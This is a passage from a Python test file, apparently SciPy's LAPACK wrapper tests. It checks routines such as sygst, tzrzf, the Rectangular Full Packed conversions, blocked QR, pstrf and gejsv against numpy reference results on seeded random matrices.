expected = np.array([1.08742917-1.96205783j,
-0.74093902+3.72973919j,
1.08742917-1.96205759j,
-0.74093896+3.72973895j])
assert_array_almost_equal(result, expected, decimal=4)
def test_sycon_hecon():
seed(1234)
for ind, dtype in enumerate(DTYPES+COMPLEX_DTYPES):
# DTYPES + COMPLEX DTYPES = <s,d,c,z> sycon + <c,z>hecon
n = 10
# For <s,d,c,z>sycon
if ind < 4:
func_lwork = get_lapack_funcs('sytrf_lwork', dtype=dtype)
funcon, functrf = get_lapack_funcs(('sycon', 'sytrf'), dtype=dtype)
A = (rand(n, n)).astype(dtype)
# For <c,z>hecon
else:
func_lwork = get_lapack_funcs('hetrf_lwork', dtype=dtype)
funcon, functrf = get_lapack_funcs(('hecon', 'hetrf'), dtype=dtype)
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
# Since sycon only refers to upper/lower part, conj() is safe here.
A = (A + A.conj().T)/2 + 2*np.eye(n, dtype=dtype)
anorm = norm(A, 1)
lwork = _compute_lwork(func_lwork, n)
ldu, ipiv, _ = functrf(A, lwork=lwork, lower=1)
rcond, _ = funcon(a=ldu, ipiv=ipiv, anorm=anorm, lower=1)
# The error is at most 1-fold
assert_(abs(1/rcond - np.linalg.cond(A, p=1))*rcond < 1)
def test_sygst():
seed(1234)
for ind, dtype in enumerate(REAL_DTYPES):
# DTYPES = <s,d> sygst
n = 10
potrf, sygst, syevd, sygvd = get_lapack_funcs(('potrf', 'sygst',
'syevd', 'sygvd'),
dtype=dtype)
A = rand(n, n).astype(dtype)
A = (A + A.T)/2
# B must be positive definite
B = rand(n, n).astype(dtype)
B = (B + B.T)/2 + 2 * np.eye(n, dtype=dtype)
# Perform eig (sygvd)
eig_gvd, _, info = sygvd(A, B)
assert_(info == 0)
# Convert to std problem potrf
b, info = potrf(B)
assert_(info == 0)
a, info = sygst(A, b)
assert_(info == 0)
eig, _, info = syevd(a)
assert_(info == 0)
assert_allclose(eig, eig_gvd, rtol=1e-4)
def test_hegst():
seed(1234)
for ind, dtype in enumerate(COMPLEX_DTYPES):
# DTYPES = <c,z> hegst
n = 10
potrf, hegst, heevd, hegvd = get_lapack_funcs(('potrf', 'hegst',
'heevd', 'hegvd'),
dtype=dtype)
A = rand(n, n).astype(dtype) + 1j * rand(n, n).astype(dtype)
A = (A + A.conj().T)/2
# B must be positive definite
B = rand(n, n).astype(dtype) + 1j * rand(n, n).astype(dtype)
B = (B + B.conj().T)/2 + 2 * np.eye(n, dtype=dtype)
# Perform eig (hegvd)
eig_gvd, _, info = hegvd(A, B)
assert_(info == 0)
# Convert to std problem potrf
b, info = potrf(B)
assert_(info == 0)
a, info = hegst(A, b)
assert_(info == 0)
eig, _, info = heevd(a)
assert_(info == 0)
assert_allclose(eig, eig_gvd, rtol=1e-4)
def test_tzrzf():
"""
This test performs an RZ decomposition in which an m x n upper trapezoidal
array M (m <= n) is factorized as M = [R 0] * Z where R is upper triangular
and Z is unitary.
"""
seed(1234)
m, n = 10, 15
for ind, dtype in enumerate(DTYPES):
tzrzf, tzrzf_lw = get_lapack_funcs(('tzrzf', 'tzrzf_lwork'),
dtype=dtype)
lwork = _compute_lwork(tzrzf_lw, m, n)
if ind < 2:
A = triu(rand(m, n).astype(dtype))
else:
A = triu((rand(m, n) + rand(m, n)*1j).astype(dtype))
# assert wrong shape arg, f2py returns generic error
assert_raises(Exception, tzrzf, A.T)
rz, tau, info = tzrzf(A, lwork=lwork)
# Check success
assert_(info == 0)
# Get Z manually for comparison
R = np.hstack((rz[:, :m], np.zeros((m, n-m), dtype=dtype)))
V = np.hstack((np.eye(m, dtype=dtype), rz[:, m:]))
Id = np.eye(n, dtype=dtype)
ref = [Id-tau[x]*V[[x], :].T.dot(V[[x], :].conj()) for x in range(m)]
Z = reduce(np.dot, ref)
assert_allclose(R.dot(Z) - A, zeros_like(A, dtype=dtype),
atol=10*np.spacing(dtype(1.0).real), rtol=0.)
def test_tfsm():
"""
Test for solving a linear system with the coefficient matrix is a
triangular array stored in Full Packed (RFP) format.
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = triu(rand(n, n) + rand(n, n)*1j + eye(n)).astype(dtype)
trans = 'C'
else:
A = triu(rand(n, n) + eye(n)).astype(dtype)
trans = 'T'
trttf, tfttr, tfsm = get_lapack_funcs(('trttf', 'tfttr', 'tfsm'),
dtype=dtype)
Afp, _ = trttf(A)
B = rand(n, 2).astype(dtype)
soln = tfsm(-1, Afp, B)
assert_array_almost_equal(soln, solve(-A, B),
decimal=4 if ind % 2 == 0 else 6)
soln = tfsm(-1, Afp, B, trans=trans)
assert_array_almost_equal(soln, solve(-A.conj().T, B),
decimal=4 if ind % 2 == 0 else 6)
# Make A, unit diagonal
A[np.arange(n), np.arange(n)] = dtype(1.)
soln = tfsm(-1, Afp, B, trans=trans, diag='U')
assert_array_almost_equal(soln, solve(-A.conj().T, B),
decimal=4 if ind % 2 == 0 else 6)
# Change side
B2 = rand(3, n).astype(dtype)
soln = tfsm(-1, Afp, B2, trans=trans, diag='U', side='R')
assert_array_almost_equal(soln, solve(-A, B2.T).conj().T,
decimal=4 if ind % 2 == 0 else 6)
def test_ormrz_unmrz():
"""
This test performs a matrix multiplication with an arbitrary m x n matric C
and a unitary matrix Q without explicitly forming the array. The array data
is encoded in the rectangular part of A which is obtained from ?TZRZF. Q
size is inferred by m, n, side keywords.
"""
seed(1234)
qm, qn, cn = 10, 15, 15
for ind, dtype in enumerate(DTYPES):
tzrzf, tzrzf_lw = get_lapack_funcs(('tzrzf', 'tzrzf_lwork'),
dtype=dtype)
lwork_rz = _compute_lwork(tzrzf_lw, qm, qn)
if ind < 2:
A = triu(rand(qm, qn).astype(dtype))
C = rand(cn, cn).astype(dtype)
orun_mrz, orun_mrz_lw = get_lapack_funcs(('ormrz', 'ormrz_lwork'),
dtype=dtype)
else:
A = triu((rand(qm, qn) + rand(qm, qn)*1j).astype(dtype))
C = (rand(cn, cn) + rand(cn, cn)*1j).astype(dtype)
orun_mrz, orun_mrz_lw = get_lapack_funcs(('unmrz', 'unmrz_lwork'),
dtype=dtype)
lwork_mrz = _compute_lwork(orun_mrz_lw, cn, cn)
rz, tau, info = tzrzf(A, lwork=lwork_rz)
# Get Q manually for comparison
V = np.hstack((np.eye(qm, dtype=dtype), rz[:, qm:]))
Id = np.eye(qn, dtype=dtype)
ref = [Id-tau[x]*V[[x], :].T.dot(V[[x], :].conj()) for x in range(qm)]
Q = reduce(np.dot, ref)
# Now that we have Q, we can test whether lapack results agree with
# each case of CQ, CQ^H, QC, and QC^H
trans = 'T' if ind < 2 else 'C'
tol = 10*np.spacing(dtype(1.0).real)
cq, info = orun_mrz(rz, tau, C, lwork=lwork_mrz)
assert_(info == 0)
assert_allclose(cq - Q.dot(C), zeros_like(C), atol=tol, rtol=0.)
cq, info = orun_mrz(rz, tau, C, trans=trans, lwork=lwork_mrz)
assert_(info == 0)
assert_allclose(cq - Q.conj().T.dot(C), zeros_like(C), atol=tol,
rtol=0.)
cq, info = orun_mrz(rz, tau, C, side='R', lwork=lwork_mrz)
assert_(info == 0)
assert_allclose(cq - C.dot(Q), zeros_like(C), atol=tol, rtol=0.)
cq, info = orun_mrz(rz, tau, C, side='R', trans=trans, lwork=lwork_mrz)
assert_(info == 0)
assert_allclose(cq - C.dot(Q.conj().T), zeros_like(C), atol=tol,
rtol=0.)
def test_tfttr_trttf():
"""
Test conversion routines between the Rectengular Full Packed (RFP) format
and Standard Triangular Array (TR)
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A_full = (rand(n, n) + rand(n, n)*1j).astype(dtype)
transr = 'C'
else:
A_full = (rand(n, n)).astype(dtype)
transr = 'T'
trttf, tfttr = get_lapack_funcs(('trttf', 'tfttr'), dtype=dtype)
A_tf_U, info = trttf(A_full)
assert_(info == 0)
A_tf_L, info = trttf(A_full, uplo='L')
assert_(info == 0)
A_tf_U_T, info = trttf(A_full, transr=transr, uplo='U')
assert_(info == 0)
A_tf_L_T, info = trttf(A_full, transr=transr, uplo='L')
assert_(info == 0)
# Create the RFP array manually (n is even!)
A_tf_U_m = zeros((n+1, n//2), dtype=dtype)
A_tf_U_m[:-1, :] = triu(A_full)[:, n//2:]
A_tf_U_m[n//2+1:, :] += triu(A_full)[:n//2, :n//2].conj().T
A_tf_L_m = zeros((n+1, n//2), dtype=dtype)
A_tf_L_m[1:, :] = tril(A_full)[:, :n//2]
A_tf_L_m[:n//2, :] += tril(A_full)[n//2:, n//2:].conj().T
assert_array_almost_equal(A_tf_U, A_tf_U_m.reshape(-1, order='F'))
assert_array_almost_equal(A_tf_U_T,
A_tf_U_m.conj().T.reshape(-1, order='F'))
assert_array_almost_equal(A_tf_L, A_tf_L_m.reshape(-1, order='F'))
assert_array_almost_equal(A_tf_L_T,
A_tf_L_m.conj().T.reshape(-1, order='F'))
# Get the original array from RFP
A_tr_U, info = tfttr(n, A_tf_U)
assert_(info == 0)
A_tr_L, info = tfttr(n, A_tf_L, uplo='L')
assert_(info == 0)
A_tr_U_T, info = tfttr(n, A_tf_U_T, transr=transr, uplo='U')
assert_(info == 0)
A_tr_L_T, info = tfttr(n, A_tf_L_T, transr=transr, uplo='L')
assert_(info == 0)
assert_array_almost_equal(A_tr_U, triu(A_full))
assert_array_almost_equal(A_tr_U_T, triu(A_full))
assert_array_almost_equal(A_tr_L, tril(A_full))
assert_array_almost_equal(A_tr_L_T, tril(A_full))
def test_tpttr_trttp():
"""
Test conversion routines between the Rectengular Full Packed (RFP) format
and Standard Triangular Array (TR)
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A_full = (rand(n, n) + rand(n, n)*1j).astype(dtype)
else:
A_full = (rand(n, n)).astype(dtype)
trttp, tpttr = get_lapack_funcs(('trttp', 'tpttr'), dtype=dtype)
A_tp_U, info = trttp(A_full)
assert_(info == 0)
A_tp_L, info = trttp(A_full, uplo='L')
assert_(info == 0)
# Create the TP array manually
inds = tril_indices(n)
A_tp_U_m = zeros(n*(n+1)//2, dtype=dtype)
A_tp_U_m[:] = (triu(A_full).T)[inds]
inds = triu_indices(n)
A_tp_L_m = zeros(n*(n+1)//2, dtype=dtype)
A_tp_L_m[:] = (tril(A_full).T)[inds]
assert_array_almost_equal(A_tp_U, A_tp_U_m)
assert_array_almost_equal(A_tp_L, A_tp_L_m)
# Get the original array from TP
A_tr_U, info = tpttr(n, A_tp_U)
assert_(info == 0)
A_tr_L, info = tpttr(n, A_tp_L, uplo='L')
assert_(info == 0)
assert_array_almost_equal(A_tr_U, triu(A_full))
assert_array_almost_equal(A_tr_L, tril(A_full))
def test_pftrf():
"""
Test Cholesky factorization of a positive definite Rectengular Full
Packed (RFP) format array
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
A = A + A.conj().T + n*eye(n)
else:
A = (rand(n, n)).astype(dtype)
A = A + A.T + n*eye(n)
pftrf, trttf, tfttr = get_lapack_funcs(('pftrf', 'trttf', 'tfttr'),
dtype=dtype)
# Get the original array from TP
Afp, info = trttf(A)
Achol_rfp, info = pftrf(n, Afp)
assert_(info == 0)
A_chol_r, _ = tfttr(n, Achol_rfp)
Achol = cholesky(A)
assert_array_almost_equal(A_chol_r, Achol)
def test_pftri():
"""
Test Cholesky factorization of a positive definite Rectengular Full
Packed (RFP) format array to find its inverse
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
A = A + A.conj().T + n*eye(n)
else:
A = (rand(n, n)).astype(dtype)
A = A + A.T + n*eye(n)
pftri, pftrf, trttf, tfttr = get_lapack_funcs(('pftri',
'pftrf',
'trttf',
'tfttr'),
dtype=dtype)
# Get the original array from TP
Afp, info = trttf(A)
A_chol_rfp, info = pftrf(n, Afp)
A_inv_rfp, info = pftri(n, A_chol_rfp)
assert_(info == 0)
A_inv_r, _ = tfttr(n, A_inv_rfp)
Ainv = inv(A)
assert_array_almost_equal(A_inv_r, triu(Ainv),
decimal=4 if ind % 2 == 0 else 6)
def test_pftrs():
"""
Test Cholesky factorization of a positive definite Rectengular Full
Packed (RFP) format array and solve a linear system
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
A = A + A.conj().T + n*eye(n)
else:
A = (rand(n, n)).astype(dtype)
A = A + A.T + n*eye(n)
B = ones((n, 3), dtype=dtype)
Bf1 = ones((n+2, 3), dtype=dtype)
Bf2 = ones((n-2, 3), dtype=dtype)
pftrs, pftrf, trttf, tfttr = get_lapack_funcs(('pftrs',
'pftrf',
'trttf',
'tfttr'),
dtype=dtype)
# Get the original array from TP
Afp, info = trttf(A)
A_chol_rfp, info = pftrf(n, Afp)
# larger B arrays shouldn't segfault
soln, info = pftrs(n, A_chol_rfp, Bf1)
assert_(info == 0)
assert_raises(Exception, pftrs, n, A_chol_rfp, Bf2)
soln, info = pftrs(n, A_chol_rfp, B)
assert_(info == 0)
assert_array_almost_equal(solve(A, B), soln,
decimal=4 if ind % 2 == 0 else 6)
def test_sfrk_hfrk():
"""
Test for performing a symmetric rank-k operation for matrix in RFP format.
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
A = A + A.conj().T + n*eye(n)
else:
A = (rand(n, n)).astype(dtype)
A = A + A.T + n*eye(n)
prefix = 's'if ind < 2 else 'h'
trttf, tfttr, shfrk = get_lapack_funcs(('trttf', 'tfttr', '{}frk'
''.format(prefix)),
dtype=dtype)
Afp, _ = trttf(A)
C = np.random.rand(n, 2).astype(dtype)
Afp_out = shfrk(n, 2, -1, C, 2, Afp)
A_out, _ = tfttr(n, Afp_out)
assert_array_almost_equal(A_out, triu(-C.dot(C.conj().T) + 2*A),
decimal=4 if ind % 2 == 0 else 6)
def test_syconv():
"""
Test for going back and forth between the returned format of he/sytrf to
L and D factors/permutations.
"""
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 10
if ind > 1:
A = (randint(-30, 30, (n, n)) +
randint(-30, 30, (n, n))*1j).astype(dtype)
A = A + A.conj().T
else:
A = randint(-30, 30, (n, n)).astype(dtype)
A = A + A.T + n*eye(n)
tol = 100*np.spacing(dtype(1.0).real)
syconv, trf, trf_lwork = get_lapack_funcs(('syconv', 'sytrf',
'sytrf_lwork'), dtype=dtype)
lw = _compute_lwork(trf_lwork, n, lower=1)
L, D, perm = ldl(A, lower=1, hermitian=False)
lw = _compute_lwork(trf_lwork, n, lower=1)
ldu, ipiv, info = trf(A, lower=1, lwork=lw)
a, e, info = syconv(ldu, ipiv, lower=1)
assert_allclose(tril(a, -1,), tril(L[perm, :], -1), atol=tol, rtol=0.)
# Test also upper
U, D, perm = ldl(A, lower=0, hermitian=False)
ldu, ipiv, info = trf(A, lower=0)
a, e, info = syconv(ldu, ipiv, lower=0)
assert_allclose(triu(a, 1), triu(U[perm, :], 1), atol=tol, rtol=0.)
class TestBlockedQR:
"""
Tests for the blocked QR factorization, namely through geqrt, gemqrt, tpqrt
and tpmqr.
"""
def test_geqrt_gemqrt(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
else:
A = (rand(n, n)).astype(dtype)
tol = 100*np.spacing(dtype(1.0).real)
geqrt, gemqrt = get_lapack_funcs(('geqrt', 'gemqrt'), dtype=dtype)
a, t, info = geqrt(n, A)
assert(info == 0)
# Extract elementary reflectors from lower triangle, adding the
# main diagonal of ones.
v = np.tril(a, -1) + np.eye(n, dtype=dtype)
# Generate the block Householder transform I - VTV^H
Q = np.eye(n, dtype=dtype) - v @ t @ v.T.conj()
R = np.triu(a)
# Test columns of Q are orthogonal
assert_allclose(Q.T.conj() @ Q, np.eye(n, dtype=dtype), atol=tol,
rtol=0.)
assert_allclose(Q @ R, A, atol=tol, rtol=0.)
if ind > 1:
C = (rand(n, n) + rand(n, n)*1j).astype(dtype)
transpose = 'C'
else:
C = (rand(n, n)).astype(dtype)
transpose = 'T'
for side in ('L', 'R'):
for trans in ('N', transpose):
c, info = gemqrt(a, t, C, side=side, trans=trans)
assert(info == 0)
if trans == transpose:
q = Q.T.conj()
else:
q = Q
if side == 'L':
qC = q @ C
else:
qC = C @ q
assert_allclose(c, qC, atol=tol, rtol=0.)
# Test default arguments
if (side, trans) == ('L', 'N'):
c_default, info = gemqrt(a, t, C)
assert(info == 0)
assert_equal(c_default, c)
# Test invalid side/trans
assert_raises(Exception, gemqrt, a, t, C, side='A')
assert_raises(Exception, gemqrt, a, t, C, trans='A')
def test_tpqrt_tpmqrt(self):
seed(1234)
for ind, dtype in enumerate(DTYPES):
n = 20
if ind > 1:
A = (rand(n, n) + rand(n, n)*1j).astype(dtype)
B = (rand(n, n) + rand(n, n)*1j).astype(dtype)
else:
A = (rand(n, n)).astype(dtype)
B = (rand(n, n)).astype(dtype)
tol = 100*np.spacing(dtype(1.0).real)
tpqrt, tpmqrt = get_lapack_funcs(('tpqrt', 'tpmqrt'), dtype=dtype)
# Test for the range of pentagonal B, from square to upper
# triangular
for l in (0, n // 2, n):
a, b, t, info = tpqrt(l, n, A, B)
assert(info == 0)
# Check that lower triangular part of A has not been modified
assert_equal(np.tril(a, -1), np.tril(A, -1))
# Check that elements not part of the pentagonal portion of B
# have not been modified.
assert_equal(np.tril(b, l - n - 1), np.tril(B, l - n - 1))
# Extract pentagonal portion of B
B_pent, b_pent = np.triu(B, l - n), np.triu(b, l - n)
# Generate elementary reflectors
v = np.concatenate((np.eye(n, dtype=dtype), b_pent))
# Generate the block Householder transform I - VTV^H
Q = np.eye(2 * n, dtype=dtype) - v @ t @ v.T.conj()
R = np.concatenate((np.triu(a), np.zeros_like(a)))
# Test columns of Q are orthogonal
assert_allclose(Q.T.conj() @ Q, np.eye(2 * n, dtype=dtype),
atol=tol, rtol=0.)
assert_allclose(Q @ R, np.concatenate((np.triu(A), B_pent)),
atol=tol, rtol=0.)
if ind > 1:
C = (rand(n, n) + rand(n, n)*1j).astype(dtype)
D = (rand(n, n) + rand(n, n)*1j).astype(dtype)
transpose = 'C'
else:
C = (rand(n, n)).astype(dtype)
D = (rand(n, n)).astype(dtype)
transpose = 'T'
for side in ('L', 'R'):
for trans in ('N', transpose):
c, d, info = tpmqrt(l, b, t, C, D, side=side,
trans=trans)
assert(info == 0)
if trans == transpose:
q = Q.T.conj()
else:
q = Q
if side == 'L':
cd = np.concatenate((c, d), axis=0)
CD = np.concatenate((C, D), axis=0)
qCD = q @ CD
else:
cd = np.concatenate((c, d), axis=1)
CD = np.concatenate((C, D), axis=1)
qCD = CD @ q
assert_allclose(cd, qCD, atol=tol, rtol=0.)
if (side, trans) == ('L', 'N'):
c_default, d_default, info = tpmqrt(l, b, t, C, D)
assert(info == 0)
assert_equal(c_default, c)
assert_equal(d_default, d)
# Test invalid side/trans
assert_raises(Exception, tpmqrt, l, b, t, C, D, side='A')
assert_raises(Exception, tpmqrt, l, b, t, C, D, trans='A')
def test_pstrf():
seed(1234)
for ind, dtype in enumerate(DTYPES):
# DTYPES = <s, d, c, z> pstrf
n = 10
r = 2
pstrf = get_lapack_funcs('pstrf', dtype=dtype)
# Create positive semidefinite A
if ind > 1:
A = rand(n, n-r).astype(dtype) + 1j * rand(n, n-r).astype(dtype)
A = A @ A.conj().T
else:
A = rand(n, n-r).astype(dtype)
A = A @ A.T
c, piv, r_c, info = pstrf(A)
U = triu(c)
U[r_c - n:, r_c - n:] = 0.
assert_equal(info, 1)
# python-dbg 3.5.2 runs cause trouble with the following assertion.
# assert_equal(r_c, n - r)
single_atol = 1000 * np.finfo(np.float32).eps
double_atol = 1000 * np.finfo(np.float64).eps
atol = single_atol if ind in [0, 2] else double_atol
assert_allclose(A[piv-1][:, piv-1], U.conj().T @ U, rtol=0., atol=atol)
c, piv, r_c, info = pstrf(A, lower=1)
L = tril(c)
L[r_c - n:, r_c - n:] = 0.
assert_equal(info, 1)
# assert_equal(r_c, n - r)
single_atol = 1000 * np.finfo(np.float32).eps
double_atol = 1000 * np.finfo(np.float64).eps
atol = single_atol if ind in [0, 2] else double_atol
assert_allclose(A[piv-1][:, piv-1], L @ L.conj().T, rtol=0., atol=atol)
def test_pstf2():
seed(1234)
for ind, dtype in enumerate(DTYPES):
# DTYPES = <s, d, c, z> pstf2
n = 10
r = 2
pstf2 = get_lapack_funcs('pstf2', dtype=dtype)
# Create positive semidefinite A
if ind > 1:
A = rand(n, n-r).astype(dtype) + 1j * rand(n, n-r).astype(dtype)
A = A @ A.conj().T
else:
A = rand(n, n-r).astype(dtype)
A = A @ A.T
c, piv, r_c, info = pstf2(A)
U = triu(c)
U[r_c - n:, r_c - n:] = 0.
assert_equal(info, 1)
# python-dbg 3.5.2 runs cause trouble with the commented assertions.
# assert_equal(r_c, n - r)
single_atol = 1000 * np.finfo(np.float32).eps
double_atol = 1000 * np.finfo(np.float64).eps
atol = single_atol if ind in [0, 2] else double_atol
assert_allclose(A[piv-1][:, piv-1], U.conj().T @ U, rtol=0., atol=atol)
c, piv, r_c, info = pstf2(A, lower=1)
L = tril(c)
L[r_c - n:, r_c - n:] = 0.
assert_equal(info, 1)
# assert_equal(r_c, n - r)
single_atol = 1000 * np.finfo(np.float32).eps
double_atol = 1000 * np.finfo(np.float64).eps
atol = single_atol if ind in [0, 2] else double_atol
assert_allclose(A[piv-1][:, piv-1], L @ L.conj().T, rtol=0., atol=atol)
def test_geequ():
desired_real = np.array([[0.6250, 1.0000, 0.0393, -0.4269],
[1.0000, -0.5619, -1.0000, -1.0000],
[0.5874, -1.0000, -0.0596, -0.5341],
[-1.0000, -0.5946, -0.0294, 0.9957]])
desired_cplx = np.array([[-0.2816+0.5359*1j,
0.0812+0.9188*1j,
-0.7439-0.2561*1j],
[-0.3562-0.2954*1j,
0.9566-0.0434*1j,
-0.0174+0.1555*1j],
[0.8607+0.1393*1j,
-0.2759+0.7241*1j,
-0.1642-0.1365*1j]])
for ind, dtype in enumerate(DTYPES):
if ind < 2:
# Use examples from the NAG documentation
A = np.array([[1.80e+10, 2.88e+10, 2.05e+00, -8.90e+09],
[5.25e+00, -2.95e+00, -9.50e-09, -3.80e+00],
[1.58e+00, -2.69e+00, -2.90e-10, -1.04e+00],
[-1.11e+00, -6.60e-01, -5.90e-11, 8.00e-01]])
A = A.astype(dtype)
else:
A = np.array([[-1.34e+00, 0.28e+10, -6.39e+00],
[-1.70e+00, 3.31e+10, -0.15e+00],
[2.41e-10, -0.56e+00, -0.83e-10]], dtype=dtype)
A += np.array([[2.55e+00, 3.17e+10, -2.20e+00],
[-1.41e+00, -0.15e+10, 1.34e+00],
[0.39e-10, 1.47e+00, -0.69e-10]])*1j
A = A.astype(dtype)
geequ = get_lapack_funcs('geequ', dtype=dtype)
r, c, rowcnd, colcnd, amax, info = geequ(A)
if ind < 2:
assert_allclose(desired_real.astype(dtype), r[:, None]*A*c,
rtol=0, atol=1e-4)
else:
assert_allclose(desired_cplx.astype(dtype), r[:, None]*A*c,
rtol=0, atol=1e-4)
def test_syequb():
desired_log2s = np.array([0, 0, 0, 0, 0, 0, -1, -1, -2, -3])
for ind, dtype in enumerate(DTYPES):
A = np.eye(10, dtype=dtype)
alpha = dtype(1. if ind < 2 else 1.j)
d = np.array([alpha * 2.**x for x in range(-5, 5)], dtype=dtype)
A += np.rot90(np.diag(d))
syequb = get_lapack_funcs('syequb', dtype=dtype)
s, scond, amax, info = syequb(A)
assert_equal(np.log2(s).astype(int), desired_log2s)
@pytest.mark.skipif(True,
reason="Failing on some OpenBLAS version, see gh-12276")
def test_heequb():
# zheequb has a bug for versions =< LAPACK 3.9.0
# See Reference-LAPACK gh-61 and gh-408
# Hence the zheequb test is customized accordingly to avoid
# work scaling.
A = np.diag([2]*5 + [1002]*5) + np.diag(np.ones(9), k=1)*1j
s, scond, amax, info = lapack.zheequb(A)
assert_equal(info, 0)
assert_allclose(np.log2(s), [0., -1.]*2 + [0.] + [-4]*5)
A = np.diag(2**np.abs(np.arange(-5, 6)) + 0j)
A[5, 5] = 1024
A[5, 0] = 16j
s, scond, amax, info = lapack.cheequb(A.astype(np.complex64), lower=1)
assert_equal(info, 0)
assert_allclose(np.log2(s), [-2, -1, -1, 0, 0, -5, 0, -1, -1, -2, -2])
def test_getc2_gesc2():
np.random.seed(42)
n = 10
desired_real = np.random.rand(n)
desired_cplx = np.random.rand(n) + np.random.rand(n)*1j
for ind, dtype in enumerate(DTYPES):
if ind < 2:
A = np.random.rand(n, n)
A = A.astype(dtype)
b = A @ desired_real
b = b.astype(dtype)
else:
A = np.random.rand(n, n) + np.random.rand(n, n)*1j
A = A.astype(dtype)
b = A @ desired_cplx
b = b.astype(dtype)
getc2 = get_lapack_funcs('getc2', dtype=dtype)
gesc2 = get_lapack_funcs('gesc2', dtype=dtype)
lu, ipiv, jpiv, info = getc2(A, overwrite_a=0)
x, scale = gesc2(lu, b, ipiv, jpiv, overwrite_rhs=0)
if ind < 2:
assert_array_almost_equal(desired_real.astype(dtype),
x/scale, decimal=4)
else:
assert_array_almost_equal(desired_cplx.astype(dtype),
x/scale, decimal=4)
@pytest.mark.parametrize('size', [(6, 5), (5, 5)])
@pytest.mark.parametrize('dtype', REAL_DTYPES)
@pytest.mark.parametrize('joba', range(6)) # 'C', 'E', 'F', 'G', 'A', 'R'
@pytest.mark.parametrize('jobu', range(4)) # 'U', 'F', 'W', 'N'
@pytest.mark.parametrize('jobv', range(4)) # 'V', 'J', 'W', 'N'
@pytest.mark.parametrize('jobr', [0, 1])
@pytest.mark.parametrize('jobp', [0, 1])
def test_gejsv_general(size, dtype, joba, jobu, jobv, jobr, jobp, jobt=0):
"""Test the lapack routine ?gejsv.
This function tests that a singular value decomposition can be performed
on the random M-by-N matrix A. The test performs the SVD using ?gejsv
then performs the following checks:
* ?gejsv exist successfully (info == 0)
* The returned singular values are correct
* `A` can be reconstructed from `u`, `SIGMA`, `v`
* Ensure that u.T @ u is the identity matrix
* Ensure that v.T @ v is the identity matrix
* The reported matrix rank
* The reported number of singular values
* If denormalized floats are required
Notes
-----
joba specifies several choices effecting the calculation's accuracy
Although all arguments are tested, the tests only check that the correct
solution is returned - NOT that the prescribed actions are performed
internally.
jobt is, as of v3.9.0, still experimental and removed to cut down number of
test cases. However keyword itself is tested externally.
"""
seed(42)
# Define some constants for later use:
m, n = size
atol = 100 * np.finfo(dtype).eps
A = generate_random_dtype_array(size, dtype)
gejsv = get_lapack_funcs('gejsv', dtype=dtype)
# Set up checks for invalid job? combinations
# if an invalid combination occurs we set the appropriate
# exit status.
lsvec = jobu < 2 # Calculate left singular vectors
rsvec = jobv < 2 # Calculate right singular vectors
l2tran = (jobt == 1) and (m == n)
is_complex = np.iscomplexobj(A)
invalid_real_jobv = (jobv == 1) and (not lsvec) and (not is_complex)
invalid_cplx_jobu = (jobu == 2) and not (rsvec and l2tran) and is_complex
invalid_cplx_jobv = (jobv == 2) and not (lsvec and l2tran) and is_complex
# Set the exit status to the expected value.
# Here we only check for invalid combinations, not individual
# parameters.
if invalid_cplx_jobu:
exit_status = -2
elif invalid_real_jobv or invalid_cplx_jobv:
exit_status = -3
else:
exit_status = 0
if (jobu > 1) and (jobv == 1):
assert_raises(Exception, gejsv, A, joba, jobu, jobv, jobr, jobt, jobp)
else:
sva, u, v, work, iwork, info = gejsv(A,
joba=joba,
jobu=jobu,
jobv=jobv,
jobr=jobr,
jobt=jobt,
jobp=jobp)
# Check that ?gejsv exited successfully/as expected
assert_equal(info, exit_status)
# If exit_status is non-zero the combination of jobs is invalid.
# We test this above but no calculations are performed.
if not exit_status:
# Check the returned singular values
sigma = (work[0] / work[1]) * sva[:n]
assert_allclose(sigma, svd(A, compute_uv=False), atol=atol)
if jobu == 1:
# If JOBU = 'F', then u contains the M-by-M matrix of
# the left singular vectors, including an ONB of the orthogonal
# complement of the Range(A)
# However, to recalculate A we are concerned about the
# first n singular values and so can ignore the latter.
# TODO: Add a test for ONB?
u = u[:, :n]
if lsvec and rsvec:
assert_allclose(u @ np.diag(sigma) @ v.conj().T, A, atol=atol)
if lsvec:
assert_allclose(u.conj().T @ u, np.identity(n), atol=atol)
if rsvec:
assert_allclose(v.conj().T @ v, np.identity(n), atol=atol)
assert_equal(iwork[0], np.linalg.matrix_rank(A))
assert_equal(iwork[1], np.count_nonzero(sigma))
# iwork[2] is non-zero if requested accuracy is not warranted for
# the data. This should never occur for these tests.
assert_equal(iwork[2], 0)
@pytest.mark.parametrize('dtype', REAL_DTYPES)
def test_gejsv_edge_arguments(dtype):
"""Test edge arguments return expected status"""
gejsv = get_lapack_funcs('gejsv', dtype=dtype)
# scalar A
sva, u, v, work, iwork, info = gejsv(1.)
assert_equal(info, 0)
assert_equal(u.shape, (1, 1))
assert_equal(v.shape, (1, 1))
assert_equal(sva, np.array([1.], dtype=dtype))
# 1d A
A = np.ones((1,), dtype=dtype)
sva, u, v, work, iwork, info = gejsv(A)
assert_equal(info, 0)
assert_equal(u.shape, (1, 1))
assert_equal(v.shape, (1, 1))
assert_equal(sva, np.array([1.], dtype=dtype))
# 2d empty A
A = np.ones((1, 0), dtype=dtype)
sva, u, v, work, iwork, info = gejsv(A)
assert_equal(info, 0)
assert_equal(u.shape, (1, 0))
assert_equal(v.shape, (1, 0))
assert_equal(sva, np.array([], dtype=dtype))
# make sure "overwrite_a" is respected - user reported in gh-13191
A = np.sin(np.arange(100).reshape(10, 10)).astype(dtype)
A = np.asfortranarray(A + A.T) # make it symmetric and column major
